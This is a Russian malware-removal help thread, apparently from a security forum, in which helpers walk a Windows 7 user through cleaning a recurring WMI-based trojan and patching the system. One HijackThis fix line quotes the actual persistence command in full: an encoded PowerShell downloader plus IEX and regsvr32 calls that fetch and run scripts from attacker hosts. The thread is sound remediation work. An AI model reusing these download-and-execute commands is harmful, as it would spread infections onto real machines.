Не избавиться от вируса

Здравствуйте. ОС Win 7 32 Prof. При проверке актуальным KVRT появляется сообщение о вирусе в систем мемори - trojan.multi.gen autorun wmi.a. Вроде как в безопасном режиме он удаляется, но через какое то время появляется вновь. Помогите избавиться, пожалуйста. Спасибо.

Уважаемый(ая) [B]ria[/B], спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]O23 - Service S3: Служба Google Update (gupdatem) - (gupdatem) - C:\Program Files\Google\Update\GoogleUpdate.exe /medsvc
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll[/code]
Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].

Приложите этот файл к своему следующему сообщению.

Пофиксил указанные Вами значения. После перезапуска компьютера их в HijackThis нет. Требуемый лог приложил.

Пофиксил указанные значения. Требуемый лог прикладываю.

Классика :>[QUOTE][color=red][b]Автоматическое обновление отключено[/b][/color]
------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3115858]Скачать обновления[/url][/b][/color]
HotFix KB3140735 [color=red][b]Внимание! [url=https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-026]Скачать обновления[/url][/b][/color]
HotFix KB3138910 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3138910]Скачать обновления[/url][/b][/color]
HotFix KB3138962 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3138962]Скачать обновления[/url][/b][/color]
HotFix KB3145739 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3145739]Скачать обновления[/url][/b][/color]
HotFix KB3146963 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3146963]Скачать обновления[/url][/b][/color]
HotFix KB3156013 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3156013]Скачать обновления[/url][/b][/color]
HotFix KB3156016 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3156016]Скачать обновления[/url][/b][/color]
HotFix KB3155178 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3155178]Скачать обновления[/url][/b][/color]
HotFix KB3153171 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3153171]Скачать обновления[/url][/b][/color]
HotFix KB3170455 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3170455]Скачать обновления[/url][/b][/color]
HotFix KB3178034 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3178034]Скачать обновления[/url][/b][/color]
HotFix KB3185911 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3185911]Скачать обновления[/url][/b][/color]
HotFix KB3184122 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3184122]Скачать обновления[/url][/b][/color]
HotFix KB3192391 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3192391]Скачать обновления[/url][/b][/color]
HotFix KB3197867 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3197867]Скачать обновления[/url][/b][/color]
HotFix KB3205394 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3205394]Скачать обновления[/url][/b][/color]
HotFix KB4012212 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212]Скачать обновления[/url][/b][/color]
HotFix KB4019263 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4019263]Скачать обновления[/url][/b][/color]
HotFix KB4022722 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4022722]Скачать обновления[/url][/b][/color]
HotFix KB4015546 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4015546]Скачать обновления[/url][/b][/color]
HotFix KB4025337 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4025337]Скачать обновления[/url][/b][/color]
HotFix KB4034679 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4034679]Скачать обновления[/url][/b][/color]
HotFix KB4041678 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4041678]Скачать обновления[/url][/b][/color]
HotFix KB4056894 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056894]Скачать обновления[/url][/b][/color]
HotFix KB4056897 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056897]Скачать обновления[/url][/b][/color]
HotFix KB4074587 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4074587]Скачать обновления[/url][/b][/color]
HotFix KB4103712 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4103712]Скачать обновления[/url][/b][/color]
HotFix KB4343899 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4343899]Скачать обновления[/url][/b][/color]
HotFix KB4457145 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4457145]Скачать обновления[/url][/b][/color]
HotFix KB4462923 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4462923]Скачать обновления[/url][/b][/color]
HotFix KB4471318 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4471318]Скачать обновления[/url][/b][/color][/QUOTE]Устанавливайте, это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в 2017-м году шифровальщики WannaCry и Petya/NotPetya, а также многими майнерами и троянами.

Проверьте также, установлены ли все сервис-паки и критические обновления к Microsoft SQL Server, сложные ли пароли к SA и другим учёткам. Проверьте левые задачи в планировщике MS SQL.
Меняйте админские пароли пользователей.
К компьютеру открыт доступ из интернета по множеству портов, в т. ч. и к SQL, видимо, чтобы уж наверняка взломали. Зачем, для чего - есть понимание?

Спасибо большое, обновления установлю. По поводу понимания SQL - сложно сказать, на компьютере установлено дилерское ПО для работы системы общепита (ркипер), SQL является его составляющей частью, устанавливалось и настраивалось дилерами. Какие порты и т.п. им надо для работы их ПО - не влезал туда, откровенно говоря.

Но хотя бы ясно, нужны к этому компьютеру подключения из интернета? Можно ограничить их с помощью файрвола, программного, либо аппаратного?

Подключения нужны, на этом компьютере лежит sql-база, к которой подключаются торговые точки через Интернет за данными (ну, и в обратном порядке - для сброса данных). Что и как на нем должно быть открыто для такого алгоритма - буду уточнять у дилеров (если они сами понимают, как работает это ПО)...

Как обновите систему - сделайте такой лог.

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

Спасибо за помощь. Из обновлений пока установил 12 штук. Некоторые пишут - комп не предназначен для выбранного обновления. Логи прикладываю. Вроде как пока больше ничего не вылезает.

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]CreateRestorePoint:
HKLM\...\Run: [] => [X]
S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
2019-01-15 08:17 - 2019-01-15 12:24 - 000000080 _____ C:\Windows\system32\s
2019-01-15 08:17 - 2019-01-15 12:24 - 000000078 _____ C:\Windows\system32\ps
2019-01-15 08:17 - 2019-01-15 12:24 - 000000076 _____ C:\Windows\system32\p
Virustotal: C:\Windows\system32\csrse.exe
Virustotal: C:\Windows\system32\max.exe
2019-01-15 07:27 - 2019-01-15 07:27 - 000782848 _____ (TODO: <公司名>) C:\Windows\system32\csrse.exe
2019-01-15 07:27 - 2019-01-15 07:27 - 000697744 _____ C:\Windows\system32\max.exe
C:\Windows\Minidump\*.dmp
2019-01-15 01:24 - 2017-03-20 14:26 - 353586948 _____ C:\Windows\MEMORY.DMP
2019-01-15 07:27 - 2019-01-15 10:18 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2016-02-10 11:07 - 2016-08-24 13:23 - 000001288 _____ () C:\Users\Бухгалтерия\AppData\Roaming\ex_log.txt
Task: {123BA8A6-5359-4BE6-BCCC-79B22618ED2B} - \GoogleUpdateTaskMachineUA -> No File <==== ATTENTION
Task: {38042203-F5F0-46C9-BA12-1A0C480F836E} - \Mysa3 -> No File <==== ATTENTION
Task: {4859C2F3-469E-4E30-90AB-D3ECA49E4A09} - no filepath
Task: {8C67F843-D41F-47A7-AF4B-18CA82BA8AA9} - \Mysa1 -> No File <==== ATTENTION
Task: {A4E002A6-0CCF-4438-B05A-75347C1ACDC3} - \Mysa -> No File <==== ATTENTION
Task: {B18D267D-575A-45BA-AB96-70DB74BFF96E} - \Mysa2 -> No File <==== ATTENTION
Task: {BFF2A1F9-7FDC-44ED-B889-12B2C666AB48} - \GoogleUpdateTaskMachineCore -> No File <==== ATTENTION
Task: {D8293838-7085-4AA8-8778-BD0737369B3B} - no filepath
Task: {F5945473-7650-4C4B-938A-FAB6477B72ED} - \ok -> No File <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":
WMI:subscription\__EventFilter->BVTFilter:
WMI:subscription\CommandLineEventConsumer->BVTConsumer:
FirewallRules: [TCP Query User{254DA482-603F-4D85-A0B1-023530A2D833}C:\utm\jre\bin\javaw.exe] => (Allow) C:\utm\jre\bin\javaw.exe No File
FirewallRules: [UDP Query User{C59B15C1-228A-46C3-96DF-67A6E6580635}C:\utm\jre\bin\javaw.exe] => (Allow) C:\utm\jre\bin\javaw.exe No File
FirewallRules: [TCP Query User{0FAC0A0C-243F-4DCD-AE07-D9DB73D14869}C:\windows\system32\mshta.exe] => (Allow) C:\windows\system32\mshta.exe (Microsoft Corporation)
FirewallRules: [UDP Query User{89B8675B-3D80-4E17-9831-3C99F37EFE41}C:\windows\system32\mshta.exe] => (Allow) C:\windows\system32\mshta.exe (Microsoft Corporation)
[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]
Отключите до перезагрузки антивирус, запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.

Перезагрузите систему самостоятельно.

Java 8 обязательно обновите до [URL="http://www.java.com/ru/download/"]текущего билда[/URL], у Вас устаревшая версия со множеством критических уязвимостей.

Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810]сделайте полный образ автозапуска uVS[/url].

Один лог прикладываю. А при попытке прикрепить архив образа автозапуска пишет о превышении предела сообщений на форуме. Как удалить предыдущие прикрепленные файлы - не совсем понимаю, я их вижу, могу выделить - но где что то типа кнопки Удалить - не нахожу на форме...

[url=http://virusinfo.info/showthread.php?t=130567]Удалите вложения[/url], относящиеся к самым старым темам.
Или выложите файл в облако/на файлообменник и дайте ссылку.

Второй лог. Вложения почистил.

Всё чисто.

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url] при наличии доступа в интернет:[CODE]var
LogPath : string;
ScriptPath : string;

begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';

if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.[/CODE]
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, приложите его к сообщению.

Лог авз

Пробуйте дообновить:[QUOTE]Поиск критических уязвимостей
Установите новый Internet Explorer
[url]https://windows.microsoft.com/ru-ru/internet-explorer/download-ie[/url]

Накопительное обновление системы безопасности для битов аннулирования ActiveX
[url]https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=787d0729-a3c5-4312-a30e-5a211a22de77[/url]

Уязвимость общих элементов управления Windows делает возможным удаленное выполнение кода
[url]https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=afdb9c83-07e7-4280-94a7-125e0e7320ae[/url]
Для установки этого обновления требуется установить SP3 для Microsoft Office 2007
[url]https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=0E40BBE7-1422-40EA-912D-2A29D709F93F[/url]

Обновление для системы безопасности Microsoft Office Word 2007
[url]https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=a58f32c8-e216-4b89-89a8-6ccfdfa399c5[/url]
Для установки этого обновления требуется установить SP3 для Microsoft Office 2007
[url]https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=0E40BBE7-1422-40EA-912D-2A29D709F93F[/url]

Обновление для системы безопасности Microsoft Office Word 2003 Compatibility Pack
[url]https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=0ea0f80e-1c6b-4e92-9ce0-4b18081bd536[/url]

Установлен Adobe Reader версии 11.0.00. Опасно использовать версии до 11.0.08
[url]https://ardownload.adobe.com/pub/adobe/reader/win/11.x/11.0.23/misc/AdbeRdrUpd11023.msp[/url][/QUOTE]

Спасибо Вам огромное за помощь!!! Что дообновится - дообновлю. Пока все работает корректно. Удачи Вам.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.